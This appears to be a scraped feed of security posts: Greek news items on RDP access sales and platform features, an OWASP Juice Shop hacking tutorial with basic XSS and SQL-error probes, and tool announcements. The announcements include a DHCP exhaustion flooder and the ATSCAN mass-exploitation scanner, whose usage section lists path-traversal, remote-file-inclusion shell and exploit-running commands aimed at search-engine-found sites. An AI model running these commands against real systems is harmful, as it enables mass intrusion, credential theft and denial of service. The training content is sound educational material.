    Εγκληματίες του διαδικτύου προσφέρουν απομακρυσμένη πρόσβαση σε παραβιασμένα IT συστήματα μέσω RDP για μόλις 10 δολάρια, ενδεχομένως επιτρέποντας στους επιτιθέμενους να κλέψουν πληροφορίες, να καταστρέψουν τα συστήματα, να αναπτύξουν ransomware και πολλά άλλα. Οι ερευνητές του McAfee Labs πρωτοανακάλυψαν την πώληση RDP στοιχείων στο dark web και σε υποκοσμικά forums, ενώ παρατήρησαν ότι αρκετοί από τους πωλητές, έχουν δεκάδες χιλιάδες παραβιασμένα συστήματα έτοιμα για πώληση. Το RDP είναι ένα εργαλείο απομακρυσμένης διαχείρισης, και περιλαμβάνεται σε όλες τις εκδώσεις των Windows. Συνήθως χρησιμοποιείται για υποστήριξη πελατών και για την διαχείριση server, μέσω δικτύου (τοπικού ή όχι). Εάν πάρουν πρόσβαση λάθος χέρια σε ένα σύστημα, τα αποτελέσματα μπορεί να είναι καταστροφικά. Σαν παράδειγμα οι ερευνητές έδωσαν το SamSam ransomware που κυκλοφόρησε νωρίτερα το 2018, το οποίο μεταδίδεται μέσω RDP. Η παροχή RDP πρόσβασης είναι ένα μεγάλο bonus για έναν hacker, καθώς δεν χρειάζεται να εισχωρήσει στο σύστημα μέσω phishing emails ή με άλλο τρόπο. Τα συστήματα που είναι προς πώληση κυμαίνονται από Windows XP μέχρι και Windows Server 2012, τα οποία είναι και τα πιο σύνηθες. Επιπλέον οι πωλητές μαζί με την πώληση, παρέχουν συμβουλές και οδηγούς για το πως να μην γίνει αντιληπτός ο αγοραστής. Μετά από ανάλυση στις IP από 3 παραβιασμένα συστήματα που αγοράσαν οι ερευνητές, παρατήρησαν ότι οι servers βρίσκονταν εντός ενός διεθνούς αεροδρομίου. Δυο από τους 3 server, φάνηκε ότι είχαν 3 users εγκατεστημένους, εκ των οποίων ο ένας ήταν ο Administrator, που πιστεύεται ότι ήταν από την εταιρεία ασφαλείας του αεροδρομίου. Οι ερευνητές προτείνουν την απαγόρευση της απομακρυσμένης διαχείρισης RDP του υπολογιστή καθώς επίσης προτείνει στους διαχειριστές των server να παρατηρούν συχνά τους users που χρησιμοποιούν τις υπηρεσίες τους, αλλά και τις IP από τις οποίες συνδέονται. Read more...
  15. Η λειτουργία ανώνυμης περιήγησης ή αλλιώς Incognito, είναι στην ουσία μία ιδιότητα στα προγράμματα περιήγησης, η οποία επιτρέπει στους χρήστες να κρύβουν το ιστορικό περιήγησής τους στο διαδίκτυο. Κυρίως, αυτή η λειτουργία χρησιμεύει στους χρήστες για να κρύβουν το ιστορικό τους από άτομα που μπορεί να έχουν φυσική πρόσβαση στους υπολογιστές τους και όχι από τα ISPs και ίσως εταιρείες όπως η Google. Η κύρια ιδέα πίσω από τη λειτουργία ανώνυμης περιήγησης, είναι να αποφευχθεί η καταγραφή του ιστορικού ενός χρήστη και να διαγράφονται όλα τα είδη cookies όταν κλείνει η λειτουργία. Η ύπαρξη της λειτουργίας ανώνυμης περιήγησης στο YouTube έγινε γνωστή νωρίτερα αυτό το έτος. Επιτρέπει στους χρήστες να απενεργοποιούν αυτά που είδαν και το ιστορικό αναζήτησης του YouTube, αποτρέποντας έτσι την εμφάνιση ενοχλητικού περιεχομένου στα προτεινόμενα. Η λειτουργία ανώνυμης περιήγησης στο YouTube έχει αρχίσει να εμφανίζεται σε συσκευές Android. Για τους χρήστες των συσκευών iOS η λειτουργία δεν έχει ενεργοποιηθεί ακόμα. Πώς θα ενεργοποιήσετε τη λειτουργία ανώνυμης περιήγησης του YouTube, στο Android smartphone σας; Βεβαιωθείτε ότι έχετε εγκαταστήσει την τελευταία ενημερωμένη έκδοση του YouTube στο Android smartphone σας. Για να ενεργοποιήσετε τη λειτουργία ανώνυμης περιήγησης του YouTube, πατήστε στην εικόνα του προφίλ σας στην επάνω δεξιά γωνία της οθόνης. Τώρα, επιλέξτε το “Turn on Incognito“. Στη συνέχεια θα εμφανιστεί ένα μήνυμα που θα σας ενημερώνει για το τι θα συμβεί σε περίπτωση που το απενεργοποιήσετε. Η λειτουργία ανώνυμης περιήγησης του YouTube δεν μπορεί να αποκρύψει τη δραστηριότητά σας στο YouTube από το ISP σας. Πώς θα απενεργοποιήσετε τη λειτουργία ανώνυμης περιήγησης στο YouTube Για να την απενεργοποιήσετε, πατήστε την επιλογή Incognito στην επάνω δεξιά γωνία και στη συνέχεια επιλέξτε το “Turn off incognito“. Πράγματα που πρέπει να γνωρίζετε Ενώ η λειτουργία της ανώνυμης περιήγησης του YouTube ακούγεται καλή, έχει ορισμένα μειονεκτήματα. Για παράδειγμα, δεν μπορείτε να αποκτήσετε πρόσβαση στις συνδρομές σας, στις συνομιλίες YouTube και στις ειδοποιήσεις, όταν η λειτουργία είναι ενεργή. Αυτό συμβαίνει επειδή όταν η λειτουργία είναι ενεργοποιημένη, έχετε αποσυνδεθεί από το λογαριασμό σας στη Google. Εναλλακτικά μπορείτε να απενεργοποιήσετε ξεχωριστά το Ιστορικό παρακολούθησης και προβολής του YouTube στις Ρυθμίσεις για να χρησιμοποιήσετε κανονικά την εφαρμογή. Read more...
  16. Μετά τις προσπάθειες του Whatsapp να περιορίσει τα fake news, είναι σειρά του Twitter να αναλάβει δράση και να διαγράψει τους ψεύτικους λογαριασμούς στην πλατφόρμα του. Όπως αναφέρθηκε από το New York Times, το Twitter θα ξεκινήσει να απενεργοποιεί “δεκάδες εκατομμύρια” πλαστών λογαριασμών από εδώ και στο εξής. Η κίνηση αυτή στοχεύει στην αποκατάσταση της εμπιστοσύνης των χρηστών προς την πλατφόρμα, μετά την άνοδο του αριθμού των ψεύτικων followers που αποκτήθηκαν με παραπλανητικά μέσα. Πολλοί λογαριασμοί φαίνεται πως έχουν «εξαγοράσει» followers, για να αυξήσουν την επιρροή τους και την κοινωνική τους θέση. Ως αποτέλεσμα αυτής της κίνησης, όσοι έχουν προσελκύσει τους followers τους με δόλια μέσα και οι χρήστες που ακολουθούνται από ψεύτικους λογαριασμούς, είναι πιθανό ότι θα δουν μια σημαντική μείωση στον αριθμό των followers τους. Αναμένεται ότι η μαζική διαγραφή των ψεύτικων λογαριασμών θα μειώσει το συνολικό αριθμό των followers της πλατφόρμας κατά 6%. Σύμφωνα με μια εκτίμηση του Twitter, ένας μέσος χρήστης θα χάσει μέχρι τέσσερις followers από τη λίστα του. Είναι αυτονόητο ότι ο αριθμός μπορεί να είναι μεγαλύτερος για τους λογαριασμούς που «εξαγόρασαν» ψεύτικους followers. Ο αντιπρόεδρος ασφαλείας του Twitter, Del Harvey δήλωσε: “Δεν θέλουμε να παροτρύνουμε την «εξαγορά» followers και τους πλαστούς λογαριασμούς, διότι δεν αποτελούν ακριβές μέτρο της επιρροής κάποιου στην πλατφόρμα ή της επιρροής του στον κόσμο.” Η κίνηση έχει ήδη ξεκινήσει και σύμφωνα με το The Washington Post, ο Αμερικανός Πρόεδρος Ντόναλντ Τραμπ είδε μια μείωση των followers του κατά 100.000. Ο αριθμός των followers του Μπαράκ Ομπάμα μειώθηκε επίσης κατά 400.000. Read more...
  17. Web application vulnerabilities are one of the most crucial points of consideration in any penetration test or security evaluation. While some security areas require a home network or computer for testing, creating a test website to learn web app security requires a slightly different approach. For a safe environment to learn about web app hacking, the OWASP Juice Shop can help. The depth and variety of web technologies provide a large and complex attack surface. There are a variety of markup languages forming graphical components of websites, scripting languages handling frontend website interaction, backend languages manipulating data, database management systems managing this data, and server technologies keeping the websites online. Each of these has their own vulnerabilities, and each of these vulnerabilities can be exploited. OWASP Juice Shop is an intentionally vulnerable web application for security training written in JavaScript. It's filled with hacking challenges of all different difficulty levels intended for the user to exploit and is a fantastic way to begin learning about web application security. Referencing the OWASP Top 10 The OWASP Top 10 Project is a document by the Open Web Application Security Project. It aims to list and archive the most common flaws present in web applications. As of the 2017 version, the list items are as follows. injection broken authentication sensitive data exposure XML external entities (XXE) broken access control security misconfiguration cross-site scripting (XSS) insecure deserialization using components with known vulnerabilities insufficient logging and monitoring Each of these vulnerabilities may be present in all sorts of different websites, and they often lead to abuse such as phishing, database exfiltration, spam, malware distribution, and other violations of privacy and security. As a web developer, it is essential to be able to recognize and understand these attacks to prevent them. For a penetration tester, understanding these vulnerability categories can allow one to improve their own web application hacking skills. To begin practicing these attacks, one can start by installing the OWASP Juice Shop, which includes vulnerabilities from all of the OWASP Top 10 categories. Step 1Install Docker According to the project's website, Docker provides "a way to run applications securely isolated in a container, packaged with all its dependencies and libraries." This means that for a tool like the OWASP Juice Shop, an entire artificial server-like stack can be easily packaged and distributed. While OWASP Juice Shop provides a few options for installation, including Node.js and Vagrant, I have found that on Linux and macOS, the easiest option is Docker. If you run into issues with the Docker installation or your operating system does not support Docker, you may find that Node.js is also a convenient option. The installation instructions for other platforms are also provided by the Juice Shop documentation. Docker supports Windows, macOS, and Linux, with downloads for packages available on the Docker installation page. Installation instructions vary by platform, but for this example, we will walk through installing docker on a Debian-based system like Ubuntu or Kali. To begin the installation, first, install the prerequisite packages to allow apt-get to use a repository over HTTPS by running the command below in a terminal emulator. sudo apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common Next, add Docker's GPG key, which will allow the integrity of packages to be verified. curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - Now, you can add the Docker repository to your system. If the following command fails, you can also use the text editor of your choice to edit the /etc/apt/sources.list file manually. This file is the repository list on systems which use the APT package manager. Simply add the component of the command below which is enclosed in quotations marks to a new line in this file, replacing "$(lsb_release -cs)" with the output of the lsb_release -cs command when run on your system. Otherwise, simply running this command alone should be enough to update your repository list. sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable" With this repository added, you can install Docker by first updating your repositories, then using apt-get install to install the tool. This can be done by running the command below. sudo apt-get update && sudo apt-get install docker-ce If you are using a Systemd-based system, you can now start the Docker service with the command below. sudo systemctl start docker Step 2Install the OWASP Juice Shop Once Docker is installed and running, the first thing we'll use will make a copy of the OWASP Juice Shop files locally. To do this, run the command below. docker pull bkimminich/juice-shop Next, we can start the Juice Shop by running the command below, binding the service to port 3000. docker run --rm -p 3000:3000 bkimminich/juice-shop When the Docker command line prints "server listening on port 3000," the service should be ready to use. root@navi ~# systemctl start docker root@navi ~# docker pull bkimminich/juice-shop Using default tag: latest latest: Pulling from bkimminich/juice-shop Digest: sha256: 056aa33f600adb143a1128e2ae42f4021f15d726347155ae4bdd37fba4e0c486 Status: Image is up to date for bkimminich/juice-shop:latest root@navi ~# docker run --rm -p 3000:3000 bkimminich/juice-shop > juice-shop@7.2.1 start /juice-shop > node app Server listening on port 3000 After this is running, the Juice Shop can be opened in a web browser, just like any other website. On Linux, the shop is located at http://localhost:3000. On macOS and Windows, it may be located at http://192.168.99.100:3000. If the page opens in your web browser and renders properly, the Juice Shop is ready to be hacked! Step 3Analyze the Juice Shop HTML One of the simplest ways to begin analyzing a web application is to look at the HTML of a given page. To do so, simply use the "View Page Source" function of your web browser, usually available under the "Developer Tools" section or a similarly named menu. HTML, which stands for HyperText Markup Language, is not a programming language in the traditional sense, but a markup language as the acronym suggests. Unlike a programming language, which defines behaviors as processes and sequences of instructions, the plain HTML code is primarily used to encapsulate other elements of a web page and place them within a page. While HTML5 has expanded passed this relatively limited function and added some capabilities traditionally handled by JavaScript and PHP, it remains widely used for compositing. Because conventional HTML doesn't follow traditional programming processes, the syntax generally wraps around other pieces of the webpage. There are tags to designate text, images, links, menu bars, and other sorts of media content or embedded scripts. This means that, generally, HTML isn't possible to exploit directly due to any sort of vulnerabilities, but it may give us a clue to what the website is doing, visible to the user or otherwise. One example of this sort of insight is shown below. While the HTML code itself doesn't present any attack opportunities, the list of JavaScript files referenced by the page within the "script" tags alerts one to some of the website's behind-the-scenes functions, some of which may prove to be a viable attack surface later. Farther into the code, one may also notice some of the different pages linked by this page. Some of these are shown in the header menu of the page, but others, such as the "score-board" page, are not. Discovery of a link like this can lead to further understanding of the structure of the website, as well as potentially finding data which was intended to be private. Step 4Use the Score Board System If you follow the link discovered in the previous step, you'll be led to the Juice Shop Score Board page. Not just a static element of the website, this scoreboard will update as different tasks are completed. Indeed, just by discovering the page itself, the first challenge will be solved. The page will alert you to the fact that you've succeeded in solving a challenge, and you may also notice that the alert is also present on the Juice Shop command line log. > juice-shop@7.2.1 start /juice-shop > node app Server listening on port 3000 Solved challenge Score Board (Find the carefully hidden 'Score Board' page.) Once you have access to the scoreboard, you can see some of the other objectives for each section. In the right column, you can also hover your mouse cursor over the "unsolved" status indicator for a hint or click the icon to be taken to further documentation of the challenge. This same format will be continuous throughout the process of attacking the Juice Shop. The different challenges are divided by difficulty level, and the scoreboard page provides an ideal guide for completing them in a logical order. Step 5Use the JavaScript Console to Analyze the Site Another way to begin to understand the structure and function of the site is to use your web browser's developer console to see what scripts are being run. The debugger can also notify you of potential errors, some of which may also prove to be security vulnerabilities. As in the case shown below, JavaScript can sometimes also lead us to discover elements which were intended to be private, such as the link to "Administration.html" in the JavaScript file "juice-shop.min.js." If you choose to follow this link to the "Administration" page, you'll already have solved the next challenge! Paying attention to the JavaScript within the Juice Shop will prove helpful as the challenges increase in difficulty, so you may wish to leave your web browser console open. Step 6Provoke a Website Error One of the objectives on the scoreboard is to provoke an error which is not handled properly. This sort of error is generally the result of poor-handling of non-standard input. While there are more than a few ways to create this sort of error within the Juice Shop, one way to do so is by using the login page. First, click on the "Login" link in the header of the website. Next, log in using the form, but instead of using a regular username, simply insert an apostrophe. You can use whatever you choose for a password. Once the form is populated, click the login button. You'll see that this error is far from human-readable, but it does provide some insight into the backend of the website. After this error is shown, another challenge — "Provoke an error that is not very gracefully handled" — is completed and shown on the scoreboard. Step 7Use Basic XSS The last hack we'll attempt on the Juice Shop is a simple reflective XSS attack. Similar to the error caused previously by non-standard inputs, if forms are not being validated, sometimes even code can be injected and run. To test this, we'll use the simple JavaScript string shown below. <script>alert("XSS")</script> This short script will simply open a small alert box with the text "XSS" if it is executed. However, unlike the login page, we're going to look for a different sort of form. Specifically, it may be ideal to look for a form which either is intended to return content to a user or one which submits content to the website directly. One simple form we can test this attack on is the search form. Simply enter the short JavaScript string into the text box and press "Search" to see what happens. If the script succeeds, you've completed another flag! We've only begun to touch on the flags and challenges included in the Juice Shop, but all of the more difficult challenges follow roughly the same format. The OWASP Juice Shop is an ideal platform to learn web application penetration testing with zero risks of any actual damage. Completing the challenge will take time, but will put you well on the way to being a web application security expert!
  18. Anastasis

    malcom: Malware Communication Analyzer

    Malcom – Malware Communication Analyzer Malcom is a tool designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes in handy when analyzing how certain malware species try to communicate with the outside world. It can help you: detect central command and control (C&C) servers understand peer-to-peer networks observe DNS fast-flux infrastructures quickly determine if a network artefact is ‘known-bad’ The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information into actionable intelligence faster. Check the wiki for a Quickstart with some nice screenshots and a tutorial on how to add your own feeds. Installation $ sudo apt-get install build-essential git python-dev libevent-dev mongodb libxml2-dev libxslt-dev zlib1g-dev redis-server libffi-dev libssl-dev python-virtualenv $ git clone https://github.com/tomchop/malcom.git $ cd malcom $ virtualenv env-malcom $ source env-malcom/bin/activate $ wget http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz $ tar xvzf scapy-latest.tar.gz $ cd scapy-2.1.0 $ python setup.py install $ pip install -r requirements.txt For IP geolocation to work, you need to download the Maxmind database and extract the file to the malcom/Malcom/auxiliary/geoIP directory. You can get Maxmind’s free (and thus more or less accurate) database from the following link: http://dev.maxmind.com/geoip/geoip2/geolite2/: $ cd Malcom/auxiliary/geoIP $ wget http://geolite.maxmind.com/download/geoip/database/GeoLite2-City.mmdb.gz $ gunzip -d GeoLite2-City.mmdb.gz $ mv GeoLite2-City.mmdb GeoIP2-City.mmdb Launch the web server from the malcom directory using ./malcom.py. Check ./malcom.py –help for listen interface and ports. For starters, you can copy the malcom.conf.example file to malcom.conf and run ./malcom.py -c malcom.conf Configuration options Dataset view (filtered to only show IPs) use Malcom for three main purposes: Quickly determine if a host, IP, or URL is “known-bad” (i.e. it has been flagged as being malicious by other websites or sources). Get some intelligence on what relates two different elements. For example, you could see that several different hosts are pointing to the same IP address (or small AS), which has been seen in previous attacks. Eventually, you could also see what those same hosts have been registered by three different email addresses, which have also been seen in phishing kits. Get a detailed overview of the kind of network traffic patterns a host is displaying. Is it pinging specific IP addresses? Is it sending SMTP traffic? Is it part of a botnet? What kind of C&C infrastructure is being used? Tutorial Copyright (C) 2013 Thomas Chopitea Source: https://github.com/tomchop/
  19. Anastasis

    subfinder: subdomain discovery tool

    SubFinder SubFinder is a subdomain discovery tool that uses various techniques to discover massive amounts of subdomains for any target. It has been aimed at a successor to the sublist3r project. SubFinder uses Passive Sources, Search Engines, Pastebins, Internet Archives, etc to find subdomains and then it uses a permutation module inspired by altdns to generate permutations and resolve them quickly using a powerful bruteforcing engine. It can also perform plain bruteforce if needed. The tool is highly customizable, and the code is built with a modular approach in mind making it easy to add functionalities and remove errors. Features Simple and modular code base making it easy to contribute. Fast And Powerful Bruteforcing Module (In Development) Powerful Permutation generation engine. (In Development) Many Passive Data Sources (20 At Present) Multiple Output Formats Ask, Baidu, Bing, Censys, CertDB, CertSpotter, CrtSH, DnsDB, DNSDumpster, FindSubdomains, Hackertarget, Netcraft, PassiveTotal, PTRArchive, Riddler, SecurityTrails, ThreatCrowd, ThreatMiner, Virustotal, WaybackArchive Installation go get github.com/Ice3man543/subfinder Usage ./subfinder -h This will display help for the tool. Here are all the switches it supports. Flag Description Example -b Use bruteforcing to find subdomains ./subfinder -d example.com -b -c Don’t show colored output ./subfinder -c -d Domain to find subdomains for ./subfinder -d example.com -dL List of domains to find subdomains for ./subfinder -dl hosts.txt -nW Remove wildcard subdomains ./subfinder -nw -o Name of the output file (Optional) ./subfinder -o output.txt -oT Write output in Aquatone style JSON format (Required -nW) ./subfinder -o output.txt -nw -oA -oJ Write output in JSON format ./subfinder -o output.json -oJ -oD Output to directory (When using multiple hosts) ./subfinder -od ~/misc/out/ -r Comma-separated list of resolvers to use ./subfinder -r 8.8.8.8,1.1.1.1 -rL File containing list of resolvers to use ./subfinder -rL resolvers.txt –recursive Use recursive subdomain finding (default: true) ./subfinder --recursive –set-config Sets a configuration option ./subfinder --set-config example=something –set-settings Sets a setting option ./subfinder --set-settings CensysPages=10 –silent Show only the subdomains found ./subfinder --silent –sources Comma-separated list of sources to use (optional) ./subfinder --sources threatcrowd,virustotal -t Number of concurrent threads (Bruteforce) ./subfinder -t 10 –timeout Seconds to wait until quitting connection ./subfinder --timeout 10 -v Display verbose output ./subfinder -v -w Wordlist for doing bruteforcing and permutation ./subfinder -w words.txt Copyright (c) 2018 Nizamul Rana Source: https://github.com/Ice3man543/
  20. Anastasis

    Expliot: Internet Of Things Exploitation Framework

    Internet Of Things Exploitation Framework Expliot is a framework for security testing IoT and IoT infrastructure. It provides a set of plugins (test cases) and can be extended easily to create new plugins. Install sudo gem install bundler sudo apt-get install ruby-dev git clone https://gitlab.com/expliot_framework/expliot.git cd expliot bundle install Run cd expliot ./efconsole.rb ef> run -h Author Name: Aseem Jakhar Twitter: @aseemjakhar Linkedin: Aseem Jakhar Source: https://gitlab.com/expliot_framework/
  21. Anastasis

    dhcpwn v1.1.0 releases: DHCP IP exhaustion attacks tool

    DHCPwn is a tool used for testing DHCP IP exhaustion attacks. It can also be used to sniff local DHCP traffic. Useful links: DHCP RFC1531 (obsolete) RFC1541 (obsolete) RFC2131 Bootstrap Protocol RFC951 Overview The DHCP protocol is connectionless and implemented via UDP. These two characteristics allow this attack to be performed. Since there is no actual connection being made between the client and server we can quickly send many spoofed requests. DHCP servers rely on the senders MAC address to allocate IP addresses. We can easily spoof many requests with different, fake MAC addresses. This will eventually exhaust the server’s ability to assign new IP addresses. Depending on the server’s method of releasing IP addresses associated with a given MAC address this attack will either be more, or less effective. For example, if a server quickly releases allocations that it doesn’t receive responses from, the attack will be less effective. This attack is typically considered to be a form of DoS. Installing $ pip3 install dhcpwn $ dhcpwn -h OR $ git clone https://github.com/mschwager/dhcpwn.git $ cd dhcpwn $ pip3 install -r requirements.txt $ python3 dhcpwn.py -h Using Flood: $ dhcpwn --interface wlan0 flood --count 256 Sniff: $ dhcpwn --interface wlan0 sniff Help: $ dhcpwn -h Copyright (C) 2016 mschwager Source: https://github.com/mschwager/
  22. ATSCAN SCANNER Advanced Search / Dork / Mass Exploitation Scanner Description Search engine Google / Bing / Ask / Yandex / Sogou ● Mass Dork Search ● Multiple instant scans. ● Mass Exploitation ● Use proxy. ● Random user agent. ● Random engine. ● Extern commands execution. ● XSS / SQLI / LFI / AFD scanner. ● Filter wordpress and Joomla sites on the server. ● Find Admin page. ● Decode / Encode Base64 / MD5 ● Ports scan. ● Extract IPs ● Extract E-mails. ● Auto-detect errors. ● Auto-detect Cms. ● Post data. ● Auto sequence repeater. ● Validation. ● Post and Get method ● And more… CHANGES: v13.3.0 Update argsList.pl Installation git clone https://github.com/AlisamTechnology/ATSCAN cd ATSCAN chmod +x ./install.sh ./install.sh chmod +x ./atscan.pl Usage –help / -h / -? Help. –proxy Set tor proxy for scans [EX: –proxy “socks://localhost:9050”] Set proxy [EX: –proxy “http://12.45.44.2:8080”] Set proxy list [EX: –proxy list.txt] -m Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] –proxy-random Random proxy [EX: –proxy-random list.txt] or –proxy-random “socks://localhost:9050”] –m-random Random of all disponibles engines –b-random Random all disponibles agents –freq Random time frequency (in seconds) –time set browser time out –dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel] -t Target –level / -l Scan level (+- Number of page results to scan) -p Set test parameter EX:id,cat,product_ID –save / -s Output. –content Print request content –data Post and Get forms. See examples –post Use post method –get Use get method –header Set headers –host Domain name [Ex: site.com] –nobanner Hide tool banner –beep Produce beep sound if positive scan found. –ifend Produce beep sound when scan process is finished. –noinfo Jump extra results info. –noping No host ping. –limit Limit max positive scan results. –valid / -v Validate by string –status Validate by http header status –ifinurl Get targets with exact string matching –sregex Get targets with exact regex matching –none Get negative validation or engine regex matching –notin Get targets where string doesnot exist in html –unique Get targets with exact dork matching –replace String to replace –with String to replace with –full –replace –full Will replace all url parametres from string to the end –payload Use your own payloads instead of tool ones –exp|-e Exploit/Payload will be added to full target –expHost Exploit will be added to the host –expIp Exploit will be added to the host ip –sql Xss scan –lfi Local file inclusion –joomrfi Scan for joomla local file inclusion. –shell Shell link [Ex: http://www.site.com/shell.txt] –wpafd Scan wordpress sites for arbitrary file download –admin Get site admin page –shost Get site subdomains –tcp TCP port –udp UDP port –sites Sites in the server –wp WordPress sites in the server –joom Joomla sites in the server –upload Get sites with upload files in the server –zip Get sites with zip files in the server –md5 Convert to md5 –encode64 Encode base64 string –decode64 decode base64 string –TARGET Will be replaced by target in extern command –HOST Will be replaced by host in extern command –HOSTIP Will be replaced by host IP in extern command –PORT Will be replaced by open port in extern command –ip Crawl to get Ips –regex Crawl to get strings matching regex –noquery Remove string value from Query url [ex: site.com/index.php?id=string] –command /-c Extern Command to execute –email Get emails rang(x-y) EX: –expHost “/index.php?id=rang(1-9)” –sql OR -t “site.com/index.php?id=rang(1-9)” –sql site.com/index.php?id=1 -> 9. repeat(txt-y) EX: –expHost “/index.php?id=repeat(../-9)wp-config.php” –sql OR -t “site.com/index.php?id=../wp-config.php” In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times [OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3 [DATA/DATAFILE] To separate data values ex: –data “name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt” –update Update tool –tool Tool info. –config User configuration. –pass Set a password for tool use. –uninstall Uninstall Tool. ● PROXY: Tor: –proxy [proxy] [Ex: –proxy socks://localhost:9050]. Proxy: Proxy: –proxy [proxy] Ex: http://12.32.1.5:8080 or –proxy list.txt Ex: –proxy my_proxies.txt ● RANDOM: Random proxy: –proxy-random [proxy list.txt] Random browser: –b-random Random engine: –m-random ● SET HEADERS: atscan –dork [dork / dorks.txt] –level [level] –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1” atscan -t target –data “name:userfile[DATAFILE]value:file.txt –post –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1” ● SEARCH ENGINE: Search: atscan –dork [dork] –level [level] Search: atscan -d [dork] -l [level] Set engine: atscan –dork [dork] –level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] Set selective engines: atscan -d [dork] -l [level] -m 1,2,3.. Search with many dorks: atscan –dork dork1 [OTHER]dork2 [OTHER]dork3] –level [level] Search and rand: atscan -d [dork] -l [level] –expHost “/index.php?id=rang(1-9)” –sql Get Server sites: atscan -t [ip] –level [value] –sites Get Server sites: atscan -t “[ip from]-[ip to]” –level [value] –sites Get Server sites: atscan -t “ip1 [OTHER]ip2” –level [value] –sites Get Server wordpress sites: atscan -t [ip] –level [value] –wp Get Server joomla sites: atscan -t [ip] –level value] –joom Get Server upload sites: atscan -t [ip] –level [value] –upload Get Server zip sites files: atscan -t [ip] –level value] –zip WP Arbitry File Download: atscan -t [ip] –level [[[value] –wpafd Joomla RFI: atscan -t [ip] –level [10] –joomfri –shell [shell link] Search + output: atscan –dork [dorks.txt] –level [level] –save Search + get emails: atscan -d [dorks.txt] -l [level] –email Search + get site emails: atscan –dork site:site.com –level [level] –email Search + get ips: atscan –dork [dork] –level [level] –ip ● REGULAR EXPRESSIONS: Regex use: atscan [–dork [dork> / -t [target]] –level [level] –regex [regex] IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) E-mails: ‘((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})’ ● REPEATER: atscan -t site.com?index.php?id=rang(1-10) –sql atscan -t [target] –expHost “/index.php?id=rang(1-10)” –sql atscan -t [target] –expHost “/index.php?id=repeat(../-9)wp-config.php” ● PORTS atscan -t [ip] –port [port] [–udp / –tcp] atscan -t (ip start)-(ip end) –port [port] [–udp / –tcp] atscan -t [ip] –port (port start)-(port end) [–udp / –tcp] –command “your extern command” ● ENCODE / DECODE: Generate MD5: –md5 [string] Encode base64: –encode64 [string] Decode base64: –decode64 [string] ● DATA: Post data: atscan -t [target] –data “field1:value1 [DATA]field2:value2 [DATA]field3:value3” [–post / –get] Wordlist: atscan -t [target] –data “name:userfile [DATAFILE]value:file.txt” [–post / –get] atscan -t [target] –data “username:john [DATA]pass:1234” [–post / –get] Post + Validation: –data “name:userfile [DATAFILE]value:file.txt” -v [string] / –status [–post / –get] ● EXTERNAL COMMANDES: atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –TARGET” atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –HOST” atscan –dork [dork / dorks.txt] –level [level] –command “nmap -sV -p 21,22,80 –HOSTIP” atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET” ● MULTIPLE SCANS: atscan –dork [dork> –level [10] –sql –lfi –wp .. atscan –dork [dork> –level [10] –replace [string] –with [string] –exp/expHost [payload] [–sql / –lfi / –wp /…] atscan -t [ip] –level [10] [–sql / –lfi / –wp /…] atscan -t [target] [–sql / –lfi / –wp /…] ● USER PAYLOADS: atscan –dork [dork] –level [10] [–lfi | –sql ..] –payload [payload | payloads.txt] ● SEARCH VALIDATION: atscan -d [dork / dorks.txt] -l [level] –status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] –status [code] –none (Positive when status does\’nt match) atscan -d [dork / dorks.txt] -l [level] –status [code] / -v [string] / –ifinurl [string] / –sregex [regex] –none atscan -d [dork / dorks.txt] -l [level] –ifinurl [string] atscan -d [dork / dorks.txt] -l [level] –sregex [regex] –valid [string] atscan -d [dork / dorks.txt] -l [level] –regex [regex] –valid [string] atscan -d [dork / dorks.txt] -l [level] –unique ● SCAN VALIDATION: atscan -t [target / targets.txt] [–status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] –exp/expHost [payload] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] [–admin / –sql ..] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –full –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –exp/expHost [payload] –status [code] / –valid [string] atscan –data “name:userfile[DATAFILE]value:file.txt” -v [string] / –status [code] [–post / –get] atscan -d [dork / dorks.txt] -l [level] [–sql / –shost ..] –status [code] / –valid [string] atscan -t [target / targets.txt] –valid [string] –not in [string] ● UPDATE TOOL: atscan –update ● UNINSTALL TOOL: atscan –uninstall Copyright (c) 2015 Alisam Technology Source: https://github.com/AlisamTechnology/
